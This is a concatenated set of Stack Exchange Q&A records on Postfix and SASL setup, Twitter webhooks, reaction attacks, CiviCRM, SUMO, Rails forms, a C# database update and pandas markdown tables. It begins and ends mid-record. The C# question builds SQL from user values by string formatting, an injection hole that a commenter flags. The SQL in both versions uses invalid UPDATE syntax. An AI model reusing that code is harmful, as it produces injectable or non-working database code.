pipe\n flags=Fq. user=bsmtp argv=\/usr\/lib\/bsmtp\/bsmtp -t$nexthop -f$sender $recipient\nscalemail-backend unix - n n - 2 pipe\n flags=R user=scalemail argv=\/usr\/lib\/scalemail\/bin\/scalemail-store ${nexthop} ${user} ${extension}\nmailman unix - n n - - pipe\n flags=FR user=list argv=\/usr\/lib\/mailman\/bin\/postfix-to-mailman.py\n ${nexthop} ${user}\n<\/code>\n\/etc\/main.cf\n<code># See \/usr\/share\/postfix\/main.cf.dist for a commented, more complete version\n\n# Debian specific: Specifying a file name will cause the first\n# line of that file to be used as the name. The Debian default\n# is \/etc\/mailname.\n#myorigin = \/etc\/mailname\n\nsmtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)\nbiff = no\n\n# appending .domain is the MUA's job.\nappend_dot_mydomain = no\n\n# Uncomment the next line to generate \"delayed mail\" warnings\n#delay_warning_time = 4h\n\nreadme_directory = no\nsmtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination\nmyhostname = server.sample.com\nalias_maps = hash:\/etc\/aliases\nalias_database = hash:\/etc\/aliases\nmyorigin = \/etc\/mailname\nmydestination = $myhostname, sample.com, server.sample.com, localhost.sample.com, localhost\nrelayhost = \nmynetworks = 127.0.0.0\/8 [::ffff:127.0.0.0]\/104 [::1]\/128\nmailbox_size_limit = 0\nrecipient_delimiter = +\ninet_interfaces = all\ninet_protocols = all\nhome_mailbox = Maildir\/\nvirtual_alias_maps = hash:\/etc\/postfix\/virtual\n\n# SASL SUPPORT FOR CLIENTS\n#\n# The following options set parameters needed by Postfix to enable\n# Cyrus-SASL support for authentication of mail clients.\nsmtpd_sasl_path = smtpd\nsmtpd_sasl_auth_enable = yes\nsmtpd_sasl_security_options = noanonymous\nsmtpd_sasl_local_domain = $myhostname\nbroken_sasl_auth_clients = yes\nsmtpd_recipient_restrictions =\n permit_sasl_authenticated,\n permit_mynetworks,\n check_relay_domains\n\ncompatibility_level = 2\n<\/code>\n\/etc\/postfix\/sasl\/smtpd.conf\n<code>pwcheck_method: saslauthd\nmech_list: plain login\n<\/code>\n\/etc\/s-nail.rc\n<code>#@ s-nail.rc\n#@ Configuration file for S-nail(1) v14.8.6\n# S-nail(1): v14.8.6 \/ 2015-12-28\n\n## The standard POSIX 2008\/Cor 1-2013 mandates the following initial settings:\n# (Keep in sync: .\/main.c:_startup(), .\/nail.rc, .\/nail.1:\"Initial settings\"!)\n# [a] noallnet, noappend, asksub, noaskbcc, noaskcc, noautoprint,\n# [b-e] nobang, nocmd, nocrt, nodebug, nodot, escape=\"~\",\n# [f-i] noflipr, nofolder, header, nohold, noignore, noignoreeof,\n# [j-o] nokeep, nokeepsave, nometoo, nooutfolder,\n# [p-r] nopage, prompt=\"? \", noquiet, norecord,\n# [s] save, nosendwait, noshowto, nosign, noSign,\n# [t-z] toplines=\"5\"\n# Notes:\n# - no*onehop* doesn't exist in this implementation.\n# (To pass options through to an MTA, either add them after a \"--\" separator\n# on the command line or by setting the *sendmail-arguments* variable.)\n# - *prompt* is \"\\\\& \" by default, which will act POSIX-compliant\n# unless the user would set *bsdcompat*\n\n## The remaining content adjusts the standard-imposed default settings.\n# Note that some of the following flags are specific to S-nail(1) and may thus\n# not work with other Mail(1) \/ mailx(1) programs.\n# Entries are marked [OPTION] if their availability is compile-time dependent\n\n## Variables\n\n# If threaded mode is activated, automatically collapse thread\nset autocollapse\n\n# Enter threaded mode automatically\n#set autosort=thread\n\n# Append rather than prepend when writing to mbox automatically.\n# This has no effect unless *hold* is unset (it is set below)\nset append\n\n# Ask for a message subject.\nset ask\n\n# *bsdannounce* prints a header summary on folder change and thus complements\n# *header* on a per-folder basis (it is meaningless unless *header* is set)\nset bsdannounce\n\n# Uncomment this in order to get coloured output in $PAGER.\n# (Coloured output is only used if $TERM is either found in *colour-terms*\n# or includes the string \"color\")\n#set colour-pager\n\n# Assume a CRT-like terminal and invoke a $PAGER\nset crt\n\n# Define date display in header summary\n#set datefield=\"%R %m-%d\" datefield-markout-older=\" %g-%m-%d\"\n\n# When composing messages a line consisting of `.' finalizes a message\nset dot\n\n# Immediately start $EDITOR (or $VISUAL) when composing a message\n#set editalong\n\n# Startup into interactive mode even if the (given) mailbox is empty\n#set emptystart\n\n# When replying to or forwarding a message the comment and name parts of email\n# addresses are removed unless this variable is set.\n#set fullnames\n\n# [OPTION] Add more entries to the history as is done by default\nset history-gabby\n\n# Do not forward to mbox by default since this is likely to be\n# irritating for most users today; also see *keepsave*\nset hold\n\n# Quote the original message in replies by \"> \" as usual on the Internet\nset indentprefix=\"> \"\n\n# Mark messages that have been answered\nset markanswered\n\n# Try to circumvent false or missing MIME Content-Type descriptions\n# (Can be set to values for extended behaviour, please see the manual.)\nset mime-counter-evidence\n\n# Control loading of mime.types(5) file: the value may be a combination of the\n# letters \"s\" and \"u\": if \"u\" is seen ~\/.mime.types will be loaded if possible;\n# \"s\" adds \/etc\/mime.types, if available; setting this without any value uses\n# only a set of builtin mimetypes; the default behaviour equals \"us\".\n# An extended syntax that allows loading of other, specified files is available\n# if the value contains an equal sign \"=\", see the manual for more\n#set mimetypes-load-control\n\n# Do not remove empty mail folders.\n# This may be relevant for privacy since other users could otherwise create\n# them with different permissions\nset keep\n\n# Do not move `save'd or `write'n message to mbox by default since this is\n# likely to be irritating for most users today; also see *hold*\nset keepsave\n\n# When writing mailbox files we strip Content-Length: and Lines: header fields\n# from edited \/ changed messages, because S-nail doesn't deal with these\n# (non-standard) fields -- and since other MUAs may rely on their content, if\n# present, it seems more useful to strip them than to keep them, now that they\n# became invalid; set this to include them nonetheless\n#set keep-content-length\n\n# A nice prompt for ISO 6429\/ECMA-48 terminals\n#set prompt=\"\\033[31m?\\?[\\$ \\@]\\& \\033[0m\"\n\n# Automatically quote the text of the message that is responded to\nset quote\n\n# On group replies, specify only the sender of the original mail in To: and\n# mention it's other recipients in the secondary Cc: instead of placing them\n# all together in To:\nset recipients-in-cc\n\n# When responding to a message, try to answer in the same character set\n#set reply-in-same-charset\n\n# [OPTION] Outgoing messages are sent in UTF-8 if possible, otherwise LATIN1.\n# Note: it is highly advisable to read the section \"Character sets\" of the\n# manual in order to understand all the possibilities that exist to fine-tune\n# charset usage (variables also of interest: *ttycharset*, *charset-8bit*,\n# *sendcharsets-else-ttycharset*; and of course we inherit the $LC_CTYPE \/\n# $LC_ALL \/ $LANG environment variables and react upon them)\nset sendcharsets=utf-8,iso-8859-1\n\n# When sending a message wait until the MTA (including the builtin SMTP one)\n# exits before accepting further commands. Only with this variable set errors\n# reported by the MTA will be recognizable!\n#set sendwait\n\n# Display real sender names in header summaries instead of only addresses\nset showname\n\n# Show recipients of messages sent by the user himself in header summaries\nset showto\n\n## Commands\n\n# Only include these selected header fields when forwarding messages\nfwdretain subject date from to\n\n# Only include the selected header fields when printing messages\nretain date from to cc subject message-id mail-followup-to reply-to\n\n## Some pipe-TYPE\/SUBTYPE entries\n\n# HTML as text, inline display via lynx(1)\n#if $features !@ HTML-FILTER\n# set pipe-text\/html=\"lynx -stdin -dump -force_html\"\n#endif\n\n# PDF display, asynchronous display via xpdf(1)\n#set pipe-application\/pdf=\"@&set -C;\\\n# : > \\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\";\\\n# trap \\\"rm -f \\\\\\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\\\\\"\\\" \\\n# EXIT INT QUIT PIPE TERM;\\\n# set +C;\\\n# cat > \\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\";\\\n# xpdf \\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\"\"\n\n# s-it-mode\n\n#Added according to docs found in internet.\nset emptystart\nset folder=Maildir\nset record=+sent\n<\/code>\n\/etc\/default\/saslauthd\n<code>#\n# Settings for saslauthd daemon\n# Please read \/usr\/share\/doc\/sasl2-bin\/README.Debian for details.\n#\n\n# Should saslauthd run automatically on startup? (default: no)\nSTART=yes\n\n# Description of this saslauthd instance. Recommended.\n# (suggestion: SASL Authentication Daemon)\nDESC=\"SASL Authentication Daemon\"\n\n# Short name of this saslauthd instance. Strongly recommended.\n# (suggestion: saslauthd)\nNAME=\"saslauthd\"\n\n# Which authentication mechanisms should saslauthd use? (default: pam)\n#\n# Available options in this Debian package:\n# getpwent -- use the getpwent() library function\n# kerberos5 -- use Kerberos 5\n# pam -- use PAM\n# rimap -- use a remote IMAP server\n# shadow -- use the local shadow password file\n# sasldb -- use the local sasldb database file\n# ldap -- use LDAP (configuration is in \/etc\/saslauthd.conf)\n#\n# Only one option may be used at a time. See the saslauthd man page\n# for more information.\n#\n# Example: MECHANISMS=\"pam\"\nMECHANISMS=\"shadow\"\n\n# Additional options for this mechanism. (default: none)\n# See the saslauthd man page for information about mech-specific options.\nMECH_OPTIONS=\"\"\n\n# How many saslauthd processes should we run? (default: 5)\n# A value of 0 will fork a new process for each connection.\nTHREADS=5\n\n# Other options (default: -c -m \/var\/run\/saslauthd)\n# Note: You MUST specify the -m option or saslauthd won't run!\n#\n# WARNING: DO NOT SPECIFY THE -d OPTION.\n# The -d option will cause saslauthd to run in the foreground instead of as\n# a daemon. This will PREVENT YOUR SYSTEM FROM BOOTING PROPERLY. If you wish\n# to run saslauthd in debug mode, please run it by hand to be safe.\n#\n# See \/usr\/share\/doc\/sasl2-bin\/README.Debian for Debian-specific information.\n# See the saslauthd man page and the output of 'saslauthd -h' for general\n# information about these options.\n#\n# Example for chroot Postfix users: \"-c -m \/var\/spool\/postfix\/var\/run\/saslauthd\"\n# Example for non-chroot Postfix users: \"-c -m \/var\/run\/saslauthd\"\n#\n# To know if your Postfix is running chroot, check \/etc\/postfix\/master.cf.\n# If it has the line \"smtp inet n - y - - smtpd\" or \"smtp inet n - - - - smtpd\"\n# then your Postfix is running in a chroot.\n# If it has the line \"smtp inet n - n - - smtpd\" then your Postfix is NOT\n# running in a chroot.\nOPTIONS=\"-c -m \/var\/run\/saslauthd\"\n<\/code>\nI would like to achieve two things:\n1. Make the \"auth login\" work correctly.\n2. Make both user be able to send email to out side, like to my gmail account.\nThanks for the help in advance.\nComment: What did you mean by \"App Password\"? I suppose you mean that I need to give google server address, my account name and password before I could send out mail using my Gmail account? This is not what I'm looking for and I know this already. The log I've shown there was created when I tried to send an email to my firstname.lastname@example.com email address from the user \"yida\". I'm not trying to send out email using my Gmail account. Hope this clarify the situation. Thanks for your comment.\nComment: I'm using the postfix software I've installed in this server.sample.com computer as my SMTP carrier. In other words, I'm trying to be my own SMTP provider.\nComment: Run 2 terminal windows. 1 is running `tail -f \/var\/log\/mail.log` and in the other try testing your outgoing mail. Watch the log output. Chances are you are timing out on some connection further up the line due to no `relayhost = ` being configured in your mail.cf file.\nComment: OK. The reasons for the time out has been identified: first, I enabled IPV6 in my LAN but my ISP does not provide IPV6 service, so I could not connect to the IPV6 address of gmail SMTP server. Second, my ISP disabled the port 25 traffic, both inbound and outbound.\nI changed the main.cf to say \"inet_protocols = ipv4\" and fixed the first problem. But for the second problem, I'm speechless.\nComment: Could you please tell me how to setup the \"relayhost = \" option? And I'm also wondering if there is anything I could do to use SSL port instead of 25 while trying to relay my email.\nComment: If you don't want your email showing from `@gmail.com` which is free to setup, then you will need to create a domain through a service that will allow you to have your own `@yourdomain.com` email address. Something like the Google Domains https:\/\/domains.google\/#\/ This will allow you to configure your email server to use their relayhosts on port 587. I have not found anyway to get around something like this due to the blocking of spam on most services now. It used to be that you could create your own without any problems, but too many people abused it.\nComment: Thank you very much for sharing the information with me. I'll investigate and try a little more about it before I should decide to give up.\nComment: Just one more comment here. I've set up my postfix to relay to a host we rent from a hosting company and having smtp service on port 587. In this way, I was able to keep my own domain name in the \"from\" address. Thank you very much for your help. I would not have been able to solve the problem without you.\nComment: Nice! Glad that you got it working! =)\nAnswer: <code>postfix\/smtp[3386]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4001:c11::1a]:25: Network is unreachable\n<\/code>\nThis is a hint that IPv6 is attempted, but not available. It looks like your computer believes it has IPv6-connectivity, while it in reality does not have it. You should probably try to disable IPv6 completely:\nAdd the following lines to <code>\/etc\/sysctl.conf<\/code>:\n<code>net.ipv6.conf.all.disable_ipv6 = 1\nnet.ipv6.conf.default.disable_ipv6 = 1\n<\/code>\nand reboot. This will disable IPv6, forcing you to use IPv4. Then try sending the e-mail again.\nFurthermore, postfix will accept mail without authentication, but if the destination is not one of the domains it is configured for, it will reject it, as it does not allow relaying e-mail in your configuration. This is important! An open relay will instantly be turned into a spam source...\nThis is configured with the line\n<code>smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination\n<\/code>\nRegarding the authentication failure, this is probably because the login method <code>auth login<\/code> is not a valid sasl authentication mechanism for your configuration. You're probably looking for <code>auth plain<\/code>. Try login from a e-mail client like thunderbird, which supports most authentication protocols.\nComment: Good point and good observation. Thank you very much for sorting that out for me.\nI've changed the main.cf file to say \"inet_protocols = ipv4\" and postfix seem to use ivp4 to search for gmail server now.\nBut still, it gives me problem. Now the email sending log reads\n\"connect to gmail-smtp-in.l.google.com[126.96.36.199]:25: Connection timed out\"\nComment: And the plain authorization failed, as well. In the mail.log file, it complains \"cannot connect to saslauthd server: No such file or directory\". But when I tried to run the command \"saslauthd -a shadow\" again, I got the information as \"Another instance of saslauthd is currently running\".\nCould you please help me further in this? Thanks.\nComment: The fact that it times out points in the direction of @Terrance comments, and you will probably need a relay host on a port different from 25 to send e-mail, or talk with your ISP to verify that port 25 is open for outgoing connections. Regarding your question about saslauth, edit your question to include the Cyrus SASL configuration. It should include the path to a listener at `\/var\/spool\/postfix\/smtpd`\nComment: OK, as a matter of fact, my ISP blocks port 25 traffics, both inbound and outbound. That's why I still could not send email to my gmail account.\nI've posted the configuration file for Cyrus SASL, that's the saslauthd file in the post. The path it uses is \"\/var\/run\/saslauthd\", so I've updated the smtpd.conf file using the same path. But still the same error when doing the auth plain and auth login.\nComment: I also tried to connect using opera mail (another MUA under windows) but failed in authentication while trying to send mail out. Same error message displayed as \"authentication failed: generic failure\".\nComment: Is there a way that I can set up POSTFIX so that it will try to relay emails using another port rather than 25? Say using the port 465?\nComment: Can you try changing the sasl path in saslauthd file to \/var\/spool\/postfix\/smtpd?\nComment: Wow, that's where the problem lies. I opened the file \/etc\/default\/saslauthd and found out that the last line should be set as 'OPTIONS=\"-c -m \/var\/spool\/postfix\/var\/run\/saslauthd\"' since my Postfix was running on chroot mode. I changed this line, put the path in the smtpd.conf file and restarted saslauthd and postfix. Everything then works fine. Thank you very much.\nComment: Since the problem of Sasl authentication has been solved, and it was my ISP who was the reason why I could not send email out, I'm considering this question is solved. Thank you very much.\n","meta":{"source":"askubuntu","title":"Postfix authentication failure, can't send email out","dup_signals":{}},"subset":"stackexchange"} +{"text":"Where to add payload URL for Twitter webhook?\n\nQuestion: Github has a webhooks tab in the settings of a repository and it has a submission for a payload URL. I looked all over the developer site for Twitter but I can't really find anything. I'm still really new to how all of this works.\nAnswer: For Twitter, you need to add your webhook URLs programmatically via the API. The documentation is here. You'll need to send an authenticated HTTP POST request to <code>https:\/\/api.twitter.com\/1.1\/account_activity\/all\/[YOUR_ENV_NAME]\/webhooks.json<\/code> with the URL specified in the URL parameter.\nIf you would like something that does more of the work for you - although this is in JavaScript, not Python - you can take a look at this tutorial using autohook.\n","meta":{"source":"stackoverflow","title":"Where to add payload URL for Twitter webhook?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is reaction attack?\n\nQuestion: In the paper of \"Reaction Attacks against Several Public-Key Cryptosystems\" CiteSeerX link, reaction attack is defined informally as \"Obtaining information about the private key or plaintext by watching the reaction of someone decrypting a given ciphertext with the private key.\"\nIs reaction attack explicitly defined in literature? What is the difference between fault attack and reaction attack -as defined here- ?\nComment: Reading their abstract, I'm certain it's an umbrella term for side-channel attack (and you've tagged as such).\nComment: Paper is [here](https:\/\/cypherpunks.ca\/~iang\/pubs\/paper-reaction-attacks.pdf) it is well-written about it on the second page. Yes, it is a side-channel but not a fault attack that targets the hardware, this is a soft attack that you get only information from the reaction like the CBC-padding oracles or the tag mismatch in GCM...\nComment: Are decryption failure attacks in these class?\nAnswer: \"Reaction attack\" seems to be just a custom name used in a few papers, meaning the reaction of the decryption oracle on maliciously crafted\/modified ciphertexts. These are just CCA attacks, not side-channel attacks a priori, but in some cases side channel information such as timing can be used.\nThese attacks are based exploiting the decryption oracle. Note that many CPA-secure schemes are not CCA-secure (e.g. CBC encryption of a block cipher is vulnerable to the padding oracle attack), however there are ways to convert them in CCA-secure schemes (e.g. adding a MAC for symmetric encryption, or the Fujisaki-Okamoto (FO) transformation for asymmetric schemes).\nComment: An example of \"reaction\" would be an error code that differs according to what went wrong in a decryption operation. I would rather take a position about the most natural endianness than about if that varying error code qualifies as a side-channel.\n","meta":{"source":"crypto.stackexchange","title":"What is reaction attack?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Canceling Recurring Contributions Without PayPal\n\nQuestion: I just noticed that our receipts for recurring contributions say \"You can cancel this recurring contribution by visiting this page\" with a link to PayPal's homepage and \"You can update your amount by visiting this page\" again, with a link to PayPal's homepage. \nAlmost all of our contributors are using credit cards, not PayPal. How can I set this so our contributors can cancel a recurring contributions or increase the amount, when they are not using PayPal? \nThank you\nCiviCRM 4.7.22 on WordPress 4.8.22\nComment: Do you use a different Payment Processor than Paypal for CCs? Go to Administer > System Settings > Payment Processors to see who you use for CCs.\nComment: That is not the issue. The issue is if someone contributions with a CC and chooses to have the contribution recurring every month, how would they cancel that?\nComment: I think it is related. I believe that link is supplied via your payment processor extension. I was asking the question because you imply that that you have a different processor for CCs than you do for ACHs. But I am guessing you use PayPal for both. But either way, look where I pointed to see who is your CC Payment Processor and then I think you can track down where the link is in the extension.\nAnswer: Have a look at this Q&A. I think it is the answer you are looking for\nWrong return URLs in PayPal Standard\n","meta":{"source":"civicrm.stackexchange","title":"Canceling Recurring Contributions Without PayPal","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error when trying to go to the folder by command line after instaling sumo\n\nQuestion: <code>$ sudo apt-get install sumo sumo-tools sumo-doc\n[sudo] password for my: \nReading package lists... Done\nBuilding dependency tree \nReading state information... Done\nsumo is already the newest version (0.27.1+dfsg1-1).\nsumo-doc is already the newest version (0.27.1+dfsg1-1).\nsumo-tools is already the newest version (0.27.1+dfsg1-1).\n0 upgraded, 0 newly installed, 0 to remove and 190 not upgraded.\nmy@my-HP-15-Notebook-PC:~$ cd'\/home\/my\/Downloads\/sumo-0.30.0' \nbash: cd\/home\/my\/Downloads\/sumo-0.30.0: No such file or directory\n<\/code>\nComment: Please run `ls -a` and paste the output\nAnswer: APT does not download to your <code>Downloads<\/code> directory. It stores its cached files in <code>\/var\/cache\/apt<\/code> but you mostly do not need to access these files directly.\nThere is one more problem with your <code>cd<\/code> command: You are missing a space between the command and the path.\nHowever, you do not have to access <code>Downloads<\/code> folder to run <code>sumo<\/code>. Once you have installed the requested package <code>sumo<\/code> using APT (you have installed it already according to <code>sumo is already the newest version<\/code>), you can simply run the commands <code>sumo<\/code>, <code>sumo-gui<\/code> etc. in your terminal.\n(My guesses of the command names are based on https:\/\/packages.ubuntu.com\/xenial\/amd64\/sumo\/filelist, have not installed <code>sumo<\/code> myself.)\nAnswer: You missed a space in the command:\n<code>cd'\/home\/my\/Downloads\/sumo-0.30.0'\n<\/code>\nChange to:\n<code>cd '\/home\/my\/Downloads\/sumo-0.30.0'\n<\/code>\n","meta":{"source":"askubuntu","title":"Error when trying to go to the folder by command line after instaling sumo","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails Nested Model Form\n\nQuestion: At the moment I have three models:\n<code>Songs have many Setlists through Allocations\nSetlists have many Songs through Allocations\nAllocations belong to Setlists and belong to Songs\n<\/code>\nMy form at the moment looks like:\n<code> <%=f.label :date, \"Set a date\" %>\n <%=f.date_select :date%>\n\n <div>\n <%= render 'song' %> \n <\/div>\n\n <%=f.submit \"Create Setlist\", class: \"btn btn-large btn-primary\" %>\n<\/code>\nthe song partial given above is:\n<code><div id=\"songSelection\">\n<table class= \"table table-striped table-bordered\">\n <thead>\n <th>Title<\/th>\n <th>Artist<\/th>\n <th>Add to Set<\/th>\n <\/thead>\n <tbody>\n <% @songs.each do |song| %>\n <tr>\n <%= nested_form_for(@setlist.allocations.build(song_id: song.id)) do |builder| %>\n <td><%= song.title %><\/td>\n <td><%= song.artist %><\/td>\n <td>\n <%= builder.submit \"Add Song\", class: \"btn btn-small btn-primary\" %>\n <% end %>\n <\/td>\n <\/tr>\n <% end %>\n <\/tbody>\n<\/table>\n<\/div>\n<\/code>\nBasically I'm trying to assign songs to setlists through allocations. At the moment it states that the f in the songs partial isn't defined. If I get rid of it then the page renders fine but doesn't function properly (i.e. whenever I click the button to add a song it redirects it saves the changes to the setlist date but doesn't assign any new allocations). Any help would be much appreciated. I realize that I may have missed out information as I'm somewhat new to this so if any additional details are needed please ask.\nI've tried using the nested form gem by Ryan Bates but I couldn't get it working. I think it's because it's not assigning a song id to the allocation when it goes to try and build it but not sure where\/how I'd put that in.\nAnswer: Try https:\/\/github.com\/ryanb\/nested_form\nComment: I've tried using this but I'm still having issues...Here's my code:\n\n `\n <% @songs.each do |song| %>\n \n <%= nested_form_for(@setlist.allocations.build(song_id: song.id)) do |builder| %>\n <%= song.title %>\n<%= song.artist %>\n<%= song.key %>\n\n <%= builder.submit \"Add Song\", class: \"btn btn-small btn-primary\" %>\n <% end %>\n \n\n <% end %>\n `\nComment: Whoops that didn't format at all! Will post it in the actual question\n","meta":{"source":"stackoverflow","title":"Rails Nested Model Form","dup_signals":{}},"subset":"stackexchange"} +{"text":"Update in C# using repository, new window and main window\n\nQuestion: This is my code used for updating a customer in c#, can someone help me correcting the code, so that it will work smoothly?\nThis is my repository code:\n<code>public static void KlantWijzigen(Klant klan)\n{\n string commandString = string.Format(\"UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) SET('{0}','{1}','{2}','{3}','{4}')\", klan.Adres, klan.Postcode, klan.Gemeente, klan.Email, klan.Telefoonnummer);\n\n OleDbConnection conn = new OleDbConnection(connectionString);\n OleDbCommand command = new OleDbCommand();\n OleDbDataAdapter adapter = new OleDbDataAdapter();\n\n conn.Open();\n\n \/\/commandstring toevoegen aan adapter\n command.Connection = conn;\n command.CommandText = commandString;\n adapter.UpdateCommand = command;\n\n \/\/command uitvoeren\n adapter.UpdateCommand.ExecuteNonQuery();\n\n \/\/databank connect\n conn.Close();\n}\n<\/code>\nMy new window code:\n<code>public partial class WindowKlantWijzig : Window\n{\n public WindowKlantWijzig()\n {\n InitializeComponent();\n }\n\n private void buttonSlaOp_Click(object sender, RoutedEventArgs e)\n {\n Klant upda = new Klant();\n\n upda.Naam = textBoxNieuweNaam.Text;\n upda.Adres = textBoxAdresNieuw.Text;\n upda.Postcode = Convert.ToInt32(textBoxPostcodeNieuw.Text);\n upda.Gemeente = textBoxGemeenteNieuw.Text;\n upda.Email = textBoxEmailNieuw.Text;\n upda.Telefoonnummer = textBoxTelefoonnummerNieuw.Text;\n\n KlantRepository.KlantWijzigen(upda);\n MessageBox.Show(\"De klant werd succesvol gewijzigd\");\n }\n}\n<\/code>\nAnd this is my main window code\n<code>private void buttonWijzigKlant_Click(object sender, RoutedEventArgs e)\n{\n if (comboBoxKlanten.SelectedIndex == -1)\n {\n MessageBox.Show(\"Selecteer de klant die je wil wijzigen\");\n }\n else\n {\n \/\/ TODO: gebruiker eerst om bevestiging vragen\n Klant klan = (Klant)comboBoxKlanten.SelectedItem;\n KlantRepository.KlantWijzigen(klan);\n MessageBox.Show(\"De klant werd succesvol gewijzigd\");\n\n \/\/combobox wordt vernieuwd\n comboBoxKlanten.ItemsSource = null;\n comboBoxKlanten.ItemsSource = KlantRepository.AlleKlanten();\n }\n}\n<\/code>\nComment: What are you trying to achieve here? What issue are you facing?\nComment: Also, `string commandString = string.Format(\"UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) SET('{0}','{1}','{2}','{3}','{4}')\", klan.Adres, klan.Postcode, klan.Gemeente, klan.Email, klan.Telefoonnummer);` is a SQL injection vulnerablility.\nComment: i'm trying to achieve that I can update records in the database. But the update must be carried out in a new window, so I can update and confirm the update in that new window.\nComment: Have you any suggestion how i can avoid the SQL injection? i'm just a newbie in programming, and this is my first programming project\nComment: You should use: `command.Parameters.Add(\"Adres\", OleDbType.VarChar).Value = klan.Adres;`\nComment: Jeroen: Can you please inform me where I should type that code, and maybe which code is unnecessary?\nComment: @JefD Added an example as answer. Veel succes ;-)\nAnswer: As response on the question from the comments, I would do it like this: (untested\/pseudo) So this is NOT the answer, but a response to prevent SQL-injections.\n<code>public static void KlantWijzigen(Klant klan)\n{\n string commandString = \"UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) SET(@Adres, @Postcode, @Gemeente, @Email, @Telefoonnummer)\";\n\n using(OleDbConnection conn = new OleDbConnection(connectionString))\n using(OleDbCommand command = new OleDbCommand())\n {\n conn.Open();\n\n \/\/commandstring toevoegen aan adapter\n command.Connection = conn;\n command.CommandText = commandString;\n\n \/\/ de velden zetten via de parameters, zodat SQL-injection niet werkt.\n command.Parameters.Add(\"Adres\", OleDbType.VarChar).Value = klan.Adres;\n command.Parameters.Add(\"Postcode\", OleDbType.VarChar).Value = klan.Postcode;\n command.Parameters.Add(\"Gemeente\", OleDbType.VarChar).Value = klan.Gemeente;\n command.Parameters.Add(\"Email\", OleDbType.VarChar).Value = klan.Email;\n command.Parameters.Add(\"Telefoonnummer\", OleDbType.VarChar).Value = klan.Telefoonnummer;\n\n OleDbDataAdapter adapter = new OleDbDataAdapter();\n\n adapter.UpdateCommand = command;\n\n \/\/command uitvoeren\n adapter.UpdateCommand.ExecuteNonQuery();\n }\n}\n<\/code>\nDon't forget... you're missing a <code>Where<\/code> clause.. so you are updating ALL records.\nYou might change (something like):\n<code> string commandString = @\"\n UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) \n SET(@Adres, @Postcode, @Gemeente, @Email, @Telefoonnummer) \n WHERE id = @Id\"; \/\/ <<--------------\n\n command.Parameters.Add(\"Id\", OleDbType.Integer).Value = klan.Id;\n<\/code>\nComment: Harteljik bedankt voor de duidelijke uitwerking, ik ga er vanavond na lestijd mee aan de slag. Bedankt!\nComment: Graag gedaan...vergeet niet de WHERE, anders wordt al je data aangepast...\n","meta":{"source":"stackoverflow","title":"Update in C# using repository, new window and main window","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I turn a dataframe into a markdown vertical table?\n\nQuestion: EDIT Answer:\nThere are two types of tables I needed. One was the regular Horizontal table view. For that, I just used the \"to_markdown()\" with the added code to removed the indeces.\nFor the vertical view I copied and pasted Ehsan's code below and it worked perfectly.\nNow, I wanted to paste these in a nice view to my excel sheet. That would have taken a bunch of work and formatting very specifically, and it won't work out with the to_markdown(), since that changes the DataFrame to a string. To get it as an index, you can't use that function. You'd either have to take your existing DataFrame and figure out how to add new rows and columns, or: create an empty DataFrame with the proper amount of columns and rows, and fill it with the necessary \"|\" formatting. After that, you'd have to fill out the empty\/correct cells with data from your DataFrame that contains the data. However, this is too much work, so instead I just copied the string over directly into the proper excel sheet using this code:\n<code>#Now we are going to save this loop's iteration into the proper Excel sheet\n file_source ='Source Used.xlsx'\n\n #load excel file\n workbook = load_workbook(filename=file_source)\n\n #Pick the sheet \"Sheet Used\"\n ws4 = workbook[\"Project X\"]\n\n #modify the desired cell\n ws4.cell(row = 1, column = 1).value = newDataFrameWithStringFormat\n\n #save the file\n workbook.save(filename=file_source)\n<\/code>\nFrom here, anytime I wanted to update my markdown website, I could just pull from the Excel sheet's first cell. It doesn't look pretty, but it works.\nEND EDIT\nI have a table that looks like this:\ndf:\n\nProject 1\nProject 2\nProject 3\n\ndata 1\ndata 2\ndata 3\n\ndata 4\ndata 5\ndata 6\n\ndata 7\ndata 8\ndata 9\n\nI want to edit this table so that it can work with, say, markdown, and be formatted well. However, to do that, I need to add a bunch of formatting to it (it basically needs to look the same as StackOverflow's table setup when writing this question). What function can I apply to it so that a new table is created that looks like this:\n\nAs you can see in this picture, the pipes and hyphens are each a new cell of data. Additionally, the Column HEADERS are at the beginning of the rows, since this is a horizontal format. How can I apply this formatting to dataframes of varying size?\nThis is what the new one should look like (I bolded the Project names myself): \nNow hypothetically, I can transpose the data and use to_markdown(), but that may still run into the issue of the top column being created as a column header. How can I avoid this by making a custom function to add in the pipes (\"|\") and hyphens?\nThank you!\nComment: to_markdown() function in pandas makes a decent work to make a markdown table out pandas data frames - check here, might help: https:\/\/pandas.pydata.org\/docs\/reference\/api\/pandas.DataFrame.to_markdown.html\nComment: I think that's a problem with markdown tables - check here: https:\/\/stackoverflow.com\/questions\/60995936\/vertical-table-headers-i-e-headers-on-the-left-in-markdown based on their suggestion in these cases better to use HTML rather than pure markdown\nComment: The best I can suggest is to transpose the dataframe, set the name of new headers as empty (df.columns = [\"\" for i in range(len(df.columns))]) and then make the first row bold in markdown (** **).\nComment: Yeah... I can see that. I'll probably go the transpose route, since I can easily automate that process. I'll post the code here once I complete it so others can make it work.\n\nThank you so much for your help! I wish I could \"Check\" mark your answer since you helped me out.\nComment: Hey Ehsan, THANK YOU! I spent all that time doing complicated formatting, and it didn't work, but this works well (add in: (df.to_markdown(showindex=False)) to get rid of the index column)\n\nHowever, there is a slight add-on to my question that will require real formatting. How can I make the column headers on the left side, as row headers, instead?\nAnswer: A potential answer:\n<code>import pandas as pd\n\ndf=pd.DataFrame({\"Project 1\":[\"data 1\", \"data 4\", \"data 7\"], \"Project 2\": [\"data 2\", \"data 5\", \"data 8\"], \"Project 3\": [\"data 3\", \"data 6\", 